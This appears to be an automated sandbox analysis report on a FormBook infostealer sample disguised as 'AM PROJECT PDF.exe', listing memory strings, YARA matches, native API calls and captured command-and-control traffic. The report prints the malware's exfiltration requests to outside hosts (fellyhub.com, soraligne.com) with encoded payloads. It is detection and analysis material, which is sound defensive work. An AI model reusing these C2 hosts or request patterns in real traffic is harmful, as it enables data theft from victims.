Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/skin/latest/pic_list/style.css?ver=220620
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 262I-Au.18.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 262I-Au.18.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 262I-Au.18.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 262I-Au.18.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://use.fontawesome.com/releases/v5.3.1/css/all.css
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 58 74 58 76 47 59 6d 58 4f 4c 4b 34 50 70 68 70 54 65 41 71 56 4b 46 4b 56 44 78 55 64 5a 77 41 6d 7e 7a 68 57 57 71 77 37 79 4d 52 4c 65 76 62 74 53 66 38 4a 37 46 7a 36 46 5f 38 31 51 38 55 4b 64 42 39 32 73 52 54 6f 31 74 61 59 6d 36 36 65 37 56 77 41 6b 55 58 75 32 6c 76 41 69 53 51 6f 6b 4c 50 42 35 55 5a 67 6e 6c 35 34 70 37 58 36 51 58 4d 63 35 6f 51 33 65 4e 39 45 4e 4f 71 38 69 65 49 44 46 30 6a 35 32 31 4c 63 52 64 6a 38 77 6a 56 56 51 37 30 56 53 76 66 4f 59 5f 4d 65 55 34 31 34 65 42 7e 4e 68 77 6b 42 68 73 46 77 7e 38 4d 36 6d 42 61 61 6b 51 4c 47 33 57 55 68 65 4b 69 4c 70 77 42 4c 78 4d 49 6a 44 6d 79 46 4f 30 79 31 38 47 74 32 58 4a 77 31 66 67 4c 6b 6e 74 61 4c 67 41 41 4c 68 44 63 59 74 4f 61 61 65 57 51 6c 45 71 6a 61 31 53 79 31 52 31 74 6b 54 51 36 53 4c 61 58 71 53 38 38 65 4b 31 73 6b 71 6d 7e 59 4f 4d 74 42 56 66 33 47 47 47 4f 6f 38 57 59 6b 70 61 28 6a 59 72 39 57 4f 79 38 44 39 34 79 48 76 6c 50 58 39 66 34 51 37 75 48 5a 6e 59 65 4a 71 5f 78 6f 59 6e 74 6d 6c 52 35 48 79 61 36 77 46 36 76 79 75 58 34 6c 35 51 48 54 4d 65 30 44 6e 72 57 5f 54 47 6e 30 79 38 44 31 5a 6c 39 76 69 4d 69 43 49 6e 39 55 33 4c 4e 73 54 7a 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: A0G=qgDxr4VVeFbjNXtXvGYmXOLK4PphpTeAqVKFKVDxUdZwAm~zhWWqw7yMRLevbtSf8J7Fz6F_81Q8UKdB92sRTo1taYm66e7VwAkUXu2lvAiSQokLPB5UZgnl54p7X6QXMc5oQ3eN9ENOq8ieIDF0j521LcRdj8wjVVQ70VSvfOY_MeU414eB~NhwkBhsFw~8M6mBaakQLG3WUheKiLpwBLxMIjDmyFO0y18Gt2XJw1fgLkntaLgAALhDcYtOaaeWQlEqja1Sy1R1tkTQ6SLaXqS88eK1skqm~YOMtBVf3GGGOo8WYkpa(jYr9WOy8D94yHvlPX9f4Q7uHZnYeJq_xoYntmlR5Hya6wF6vyuX4l5QHTMe0DnrW_TGn0y8D1Zl9viMiCIn9U3LNsTzmQ).
Source: unknown DNS traffic detected: queries for: www.fellyhub.com
Source: global traffic HTTP traffic detected: GET /rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw== HTTP/1.1Host: www.fellyhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX HTTP/1.1Host: www.soraligne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Creates a DirectInput object (often for capturing keystrokes)
Source: AM PROJECT PDF.exe, 00000000.00000002.299387212.00000000007DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.425240569.0000000001050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: AM PROJECT PDF.exe PID: 2104, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: AM PROJECT PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.425240569.0000000001050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: AM PROJECT PDF.exe PID: 2104, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_06C62F48 0_2_06C62F48
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_0242E9E8 0_2_0242E9E8
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_0242BF84 0_2_0242BF84
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_06DA783C 0_2_06DA783C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116F900 6_2_0116F900
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123E824 6_2_0123E824
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221002 6_2_01221002
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A830 6_2_0118A830
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117B090 6_2_0117B090
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012320A8 6_2_012320A8
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012328EC 6_2_012328EC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01232B28 6_2_01232B28
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AB40 6_2_0118AB40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119EBB0 6_2_0119EBB0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122DBD2 6_2_0122DBD2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012203DA 6_2_012203DA
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121FA2B 6_2_0121FA2B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012322AE 6_2_012322AE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01232D07 6_2_01232D07
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01160D20 6_2_01160D20
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01231D55 6_2_01231D55
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117D5E0 6_2_0117D5E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012325DD 6_2_012325DD
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117841F 6_2_0117841F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122D466 6_2_0122D466
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01231FF1 6_2_01231FF1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123DFCE 6_2_0123DFCE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01186E30 6_2_01186E30
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122D616 6_2_0122D616
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01232EF7 6_2_01232EF7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004012A3 6_2_004012A3
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00422844 6_2_00422844
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004044C7 6_2_004044C7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0040B4F7 6_2_0040B4F7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0040FED7 6_2_0040FED7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004046E7 6_2_004046E7
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: String function: 0116B150 appears 66 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_011A9910
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A99A0 NtCreateSection,LdrInitializeThunk, 6_2_011A99A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9840 NtDelayExecution,LdrInitializeThunk, 6_2_011A9840
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_011A9860
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A98F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_011A98F0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_011A9A00
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A20 NtResumeThread,LdrInitializeThunk, 6_2_011A9A20
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A50 NtCreateFile,LdrInitializeThunk, 6_2_011A9A50
